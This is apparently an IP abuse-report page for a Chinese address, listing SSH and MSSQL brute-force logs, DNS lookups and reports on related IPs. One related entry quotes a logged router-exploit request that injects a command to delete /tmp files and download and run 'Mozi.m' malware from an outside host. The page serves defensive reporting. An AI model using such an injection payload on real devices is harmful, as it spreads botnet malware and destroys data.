Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: ChinaNet Hunan Province Network

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
Type Details Datetime
attackbotsspam
DATE:2020-08-26 14:33:39, IP:222.242.104.61, PORT:1433 MSSQL brute force auth on honeypot server (honey-neo-dc)
2020-08-27 03:45:05
Comments on same subnet:
IP Type Details Datetime
222.242.104.188 attackbotsspam
fail2ban
2020-04-01 04:23:25
222.242.104.188 attack
Nov 16 00:12:29 hpm sshd\[18774\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188  user=root
Nov 16 00:12:31 hpm sshd\[18774\]: Failed password for root from 222.242.104.188 port 45760 ssh2
Nov 16 00:17:28 hpm sshd\[19172\]: Invalid user rosicler from 222.242.104.188
Nov 16 00:17:28 hpm sshd\[19172\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Nov 16 00:17:30 hpm sshd\[19172\]: Failed password for invalid user rosicler from 222.242.104.188 port 51478 ssh2
2019-11-16 19:34:28
222.242.104.188 attackspam
Nov 13 13:53:12 hpm sshd\[5519\]: Invalid user sutarwala from 222.242.104.188
Nov 13 13:53:12 hpm sshd\[5519\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Nov 13 13:53:14 hpm sshd\[5519\]: Failed password for invalid user sutarwala from 222.242.104.188 port 56791 ssh2
Nov 13 13:57:58 hpm sshd\[5922\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188  user=root
Nov 13 13:58:00 hpm sshd\[5922\]: Failed password for root from 222.242.104.188 port 51000 ssh2
2019-11-14 08:07:25
222.242.104.188 attackbots
Nov  8 06:06:30 meumeu sshd[19092]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 
Nov  8 06:06:32 meumeu sshd[19092]: Failed password for invalid user resume from 222.242.104.188 port 54851 ssh2
Nov  8 06:12:51 meumeu sshd[19872]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 
...
2019-11-08 14:12:47
222.242.104.188 attack
2019-11-07T11:11:10.554164scmdmz1 sshd\[29526\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188  user=root
2019-11-07T11:11:12.512936scmdmz1 sshd\[29526\]: Failed password for root from 222.242.104.188 port 59924 ssh2
2019-11-07T11:16:01.039682scmdmz1 sshd\[29905\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188  user=root
...
2019-11-07 21:24:17
222.242.104.188 attack
2019-10-30T15:29:50.282978hub.schaetter.us sshd\[28759\]: Invalid user anuj from 222.242.104.188 port 41408
2019-10-30T15:29:50.289762hub.schaetter.us sshd\[28759\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
2019-10-30T15:29:52.035219hub.schaetter.us sshd\[28759\]: Failed password for invalid user anuj from 222.242.104.188 port 41408 ssh2
2019-10-30T15:36:57.159287hub.schaetter.us sshd\[28790\]: Invalid user 123a from 222.242.104.188 port 55496
2019-10-30T15:36:57.167451hub.schaetter.us sshd\[28790\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
...
2019-10-30 23:51:21
222.242.104.188 attack
Invalid user biadmin from 222.242.104.188 port 43769
2019-10-20 01:28:00
222.242.104.188 attack
Oct 15 01:41:19 web9 sshd\[7301\]: Invalid user woods from 222.242.104.188
Oct 15 01:41:19 web9 sshd\[7301\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Oct 15 01:41:22 web9 sshd\[7301\]: Failed password for invalid user woods from 222.242.104.188 port 50234 ssh2
Oct 15 01:47:51 web9 sshd\[8198\]: Invalid user bitch from 222.242.104.188
Oct 15 01:47:51 web9 sshd\[8198\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
2019-10-15 20:00:49
222.242.104.188 attackbots
Sep 22 02:02:32 xtremcommunity sshd\[349941\]: Invalid user squ1sh from 222.242.104.188 port 47312
Sep 22 02:02:32 xtremcommunity sshd\[349941\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Sep 22 02:02:33 xtremcommunity sshd\[349941\]: Failed password for invalid user squ1sh from 222.242.104.188 port 47312 ssh2
Sep 22 02:09:05 xtremcommunity sshd\[350102\]: Invalid user norberta from 222.242.104.188 port 58837
Sep 22 02:09:05 xtremcommunity sshd\[350102\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
...
2019-09-22 14:18:17
222.242.104.188 attack
Triggered by Fail2Ban at Vostok web server
2019-09-11 04:04:15
222.242.104.188 attackbotsspam
Sep  7 05:59:17 lcprod sshd\[10185\]: Invalid user 1234 from 222.242.104.188
Sep  7 05:59:17 lcprod sshd\[10185\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Sep  7 05:59:19 lcprod sshd\[10185\]: Failed password for invalid user 1234 from 222.242.104.188 port 59290 ssh2
Sep  7 06:06:52 lcprod sshd\[10824\]: Invalid user 123 from 222.242.104.188
Sep  7 06:06:52 lcprod sshd\[10824\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
2019-09-08 00:19:48
222.242.104.188 attackspam
Sep  6 06:52:09 game-panel sshd[32248]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Sep  6 06:52:11 game-panel sshd[32248]: Failed password for invalid user teamspeak3 from 222.242.104.188 port 51463 ssh2
Sep  6 06:57:48 game-panel sshd[32472]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
2019-09-06 15:07:28
222.242.104.188 attackspambots
Sep  6 02:03:15 eventyay sshd[19877]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Sep  6 02:03:17 eventyay sshd[19877]: Failed password for invalid user 123 from 222.242.104.188 port 59523 ssh2
Sep  6 02:07:56 eventyay sshd[20000]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
...
2019-09-06 08:17:53
222.242.104.188 attack
Aug 15 09:03:55 xtremcommunity sshd\[12127\]: Invalid user rs from 222.242.104.188 port 54382
Aug 15 09:03:55 xtremcommunity sshd\[12127\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Aug 15 09:03:57 xtremcommunity sshd\[12127\]: Failed password for invalid user rs from 222.242.104.188 port 54382 ssh2
Aug 15 09:10:37 xtremcommunity sshd\[12496\]: Invalid user tisha from 222.242.104.188 port 49137
Aug 15 09:10:37 xtremcommunity sshd\[12496\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
...
2019-08-15 21:15:23
222.242.104.188 attackbots
Aug 14 21:41:12 MK-Soft-VM3 sshd\[14914\]: Invalid user pussy from 222.242.104.188 port 52172
Aug 14 21:41:12 MK-Soft-VM3 sshd\[14914\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188
Aug 14 21:41:14 MK-Soft-VM3 sshd\[14914\]: Failed password for invalid user pussy from 222.242.104.188 port 52172 ssh2
...
2019-08-15 06:11:08
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 222.242.104.61
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 11830
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;222.242.104.61.			IN	A

;; AUTHORITY SECTION:
.			387	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020082601 1800 900 604800 86400

;; Query time: 27 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Aug 27 03:45:02 CST 2020
;; MSG SIZE  rcvd: 118
Host info
Host 61.104.242.222.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 61.104.242.222.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
119.118.128.21 attack
23/tcp
[2020-09-30]1pkt
2020-10-01 12:03:57
212.70.149.52 attack
Oct  1 06:17:47 cho postfix/smtpd[3980224]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Oct  1 06:18:12 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Oct  1 06:18:38 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Oct  1 06:19:04 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Oct  1 06:19:29 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
...
2020-10-01 12:22:28
104.248.1.92 attackbotsspam
2020-09-30T12:52:23.576159correo.[domain] sshd[8106]: Failed password for invalid user test from 104.248.1.92 port 57110 ssh2
2020-09-30T13:02:25.981878correo.[domain] sshd[9162]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.1.92 user=root
2020-09-30T13:02:27.670510correo.[domain] sshd[9162]: Failed password for root from 104.248.1.92 port 52250 ssh2
...
2020-10-01 08:59:30
87.251.70.83 attackspam
port scan and connect, tcp 8080 (http-proxy)
2020-10-01 12:17:34
49.234.87.24 attackbots
SSH invalid-user multiple login attempts
2020-10-01 12:22:01
201.249.182.130 attack
445/tcp 445/tcp
[2020-09-30]2pkt
2020-10-01 12:22:59
85.204.246.185 attackbots
Oct  1 04:15:20 mavik sshd[29522]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.204.246.185
Oct  1 04:15:22 mavik sshd[29522]: Failed password for invalid user joao from 85.204.246.185 port 59478 ssh2
Oct  1 04:21:19 mavik sshd[29824]: Invalid user test from 85.204.246.185
Oct  1 04:21:19 mavik sshd[29824]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.204.246.185
Oct  1 04:21:20 mavik sshd[29824]: Failed password for invalid user test from 85.204.246.185 port 41780 ssh2
...
2020-10-01 12:06:02
111.125.120.235 attackbotsspam
WordPress wp-login brute force :: 111.125.120.235 0.096 BYPASS [30/Sep/2020:20:41:48 +0000] [censored_2] "POST /wp-login.php HTTP/1.1" 200 2577 "https://[censored_2]/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2020-10-01 12:21:41
177.154.226.89 attackspam
(smtpauth) Failed SMTP AUTH login from 177.154.226.89 (BR/Brazil/-): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: 2020-10-01 00:11:51 plain authenticator failed for ([177.154.226.89]) [177.154.226.89]: 535 Incorrect authentication data (set_id=info)
2020-10-01 12:10:48
62.28.217.62 attackbots
Oct 1 05:46:54 *hidden* sshd[24534]: Failed password for invalid user oracle from 62.28.217.62 port 62250 ssh2
Oct 1 05:52:28 *hidden* sshd[27010]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.28.217.62 user=root
Oct 1 05:52:31 *hidden* sshd[27010]: Failed password for *hidden* from 62.28.217.62 port 52746 ssh2
2020-10-01 12:06:21
103.79.165.153 attack
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.79.165.153:45258/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2020-10-01 09:09:43
115.63.37.156 attackbots
/boaform/admin/formLogin%3Fusername=user%26psd=user
2020-10-01 09:05:00
222.223.32.228 attackspambots
Sep 30 22:44:55 ajax sshd[20004]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.223.32.228 
Sep 30 22:44:58 ajax sshd[20004]: Failed password for invalid user bala from 222.223.32.228 port 50048 ssh2
2020-10-01 12:01:26
54.79.183.95 spamattack
54.79.183.95 - - [01/Oct/2020:11:23:32 +1000] "GET /NlpsnoP83Wm7 HTTP/1.1" 404 28236 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
54.79.183.95 - - [01/Oct/2020:11:23:34 +1000] "GET /kwhEYwj0hOyL.php HTTP/1.1" 404 28182 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
54.79.183.95 - - [01/Oct/2020:11:23:33 +1000] "GET /KlaebCadFcK1/ HTTP/1.1" 404 28181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
54.79.183.95 - - [01/Oct/2020:11:23:32 +1000] "GET /NlpsnoP83Wm7 HTTP/1.1" 404 28236 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
2020-10-01 11:46:34
94.153.224.202 attackspam
2020-09-30T15:09:13.986535727Z wordpress(ufrj.br): Blocked username authentication attempt for [login] from 94.153.224.202
...
2020-10-01 09:05:29
